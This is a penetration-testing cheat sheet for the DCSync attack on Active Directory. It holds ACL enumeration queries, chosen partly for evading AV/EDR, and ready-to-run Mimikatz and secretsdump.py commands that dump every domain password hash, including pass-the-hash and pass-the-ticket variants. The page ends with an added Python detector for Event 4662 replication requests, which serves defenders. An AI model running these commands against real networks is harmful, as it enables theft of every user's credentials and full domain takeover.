
DCSync

DCSync Overview

DCSync abuses a legitimate function of Active Directory: domain controllers replicate directory data by requesting a sync from another domain controller in the environment, so this functionality cannot be disabled.

Normally, the right to request this replication is restricted to administrative users and groups, but when domain ACLs are misconfigured and a user is granted it, that user can pull the password hashes of every account in the domain.


Enumerating ACLs

PowerShell AD Module

I put this one first because it is unlikely to be flagged by on-host AV/EDR, unlike PowerView, which is very likely to be flagged and removed.

See PowerShell AD Module on Any Domain Host as Any User

# Assumes domain is contoso.org
# List any principals with ACEs on the domain root that allow a DC sync
# (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All,
#  DS-Replication-Get-Changes-In-Filtered-Set); requires the AD module's AD: drive

Get-Acl "ad:\dc=contoso,dc=org" |
    Select -Expand Access |
    Where {
        $_.ObjectType -eq "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2" -or `
        $_.ObjectType -eq "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2" -or `
        $_.ObjectType -eq "89e95b76-444d-4c62-991a-0facbeda640c"
    } | Select -Expand IdentityReference -Unique | Sort


PowerView

# Assumes domain is contoso.org
# Enumerate principals with ACEs allowing DC sync (or GenericAll, which includes it)

Get-ObjectAcl -DistinguishedName "dc=contoso,dc=org" -ResolveGUIDs |
    Where { $_.ObjectType -match 'replication-get' -or $_.ActiveDirectoryRights -match 'GenericAll' }



DCSync Attack

Mimikatz (Local)

If you have compromised a host and hold a TGT for a user who can DCSync, Mimikatz can perform the attack from that host.

# Assumes the domain is contoso.org
# Dump all hashes from the domain controller

lsadump::dcsync /dc:dc01.contoso.org /domain:contoso.org /all /csv

# The same command via PowerShell Invoke-Mimikatz

Invoke-Mimikatz 'lsadump::dcsync /dc:dc01.contoso.org /domain:contoso.org /all /csv'


secretsdump.py (Remote)

# Assumes domain is contoso.org
# Password authentication
secretsdump.py -outputfile 'dcsync.txt' 'contoso.org/username:userpassword@dc-ip-address'

# Pass the hash
secretsdump.py -outputfile 'dcsync.txt' -hashes 'lm-hash:nt-hash' 'contoso.org/username@dc-ip-address'

# Pass the ticket
# If proxying through a jump host, add dc-fqdn to /etc/hosts so Kerberos can resolve the DC
getTGT.py -dc-ip domain-controller-ip -hashes lm-hash:nt-hash 'contoso.org/username'
export KRB5CCNAME='username.ccache'
# -k uses the ticket in KRB5CCNAME; -no-pass stops secretsdump from prompting for a password
secretsdump.py -k -no-pass -outputfile 'dcsync.txt' 'contoso.org/username@dc-fqdn'
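Detection logic for the activity above, as an added example that is not part of the original page: every DCSync request (Mimikatz or secretsdump alike) is recorded on the DC as Windows Security Event 4662 with the replication GUIDs from the ACL queries above in its Properties field, so filtering those events for subjects that are not domain controller computer accounts surfaces the attack. The sample events and the DC account list are constructed.

```python
# Added example (not from the original page): flag Windows Security Event 4662
# records that look like DCSync. A DC replicating normally logs the same event,
# so the subject is checked against the known DC computer accounts.
# Sample events and the DC list below are constructed, not real telemetry.

# Extended rights whose GUIDs appear in the Properties field of Event 4662.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Assumed: computer accounts of the domain's DCs (the Domain Controllers OU).
DOMAIN_CONTROLLERS = {"DC01$", "DC02$"}
CONTROL_ACCESS = 0x100  # ADS_RIGHT_DS_CONTROL_ACCESS bit in the 4662 AccessMask

def replication_rights_in(properties):
    """Names of replication rights whose GUIDs occur in a 4662 Properties field."""
    text = properties.lower()
    return {name for guid, name in REPLICATION_RIGHTS.items() if guid in text}

def is_dcsync_candidate(event):
    """True when a non-DC principal exercised a replication right on the domain."""
    if event.get("EventID") != 4662:
        return False
    if (int(event.get("AccessMask", "0"), 16) & CONTROL_ACCESS) == 0:
        return False
    if not replication_rights_in(event.get("Properties", "")):
        return False
    return event.get("SubjectUserName", "").upper() not in DOMAIN_CONTROLLERS

def find_dcsync(events):
    """Subject accounts of all DCSync candidates, in log order."""
    return [e["SubjectUserName"] for e in events if is_dcsync_candidate(e)]

# Constructed sample events in the field layout of the raw 4662 record.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC02$", "AccessMask": "0x100",  # normal replication
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "AccessMask": "0x100",  # user pulling all changes
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "svc_backup", "AccessMask": "0x100",  # other right (placeholder GUID)
     "Properties": "{00000000-0000-0000-0000-000000000000}"},
    {"EventID": 4624, "SubjectUserName": "jdoe", "AccessMask": "0x0", "Properties": ""},  # logon, not 4662
]

if __name__ == "__main__":
    print("DCSync candidates:", find_dcsync(SAMPLE_EVENTS))  # prints ['jdoe']
```

Auditing for 4662 requires the "Directory Service Access" subcategory to be enabled and a SACL on the domain root for the replication rights; otherwise the event is never written.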


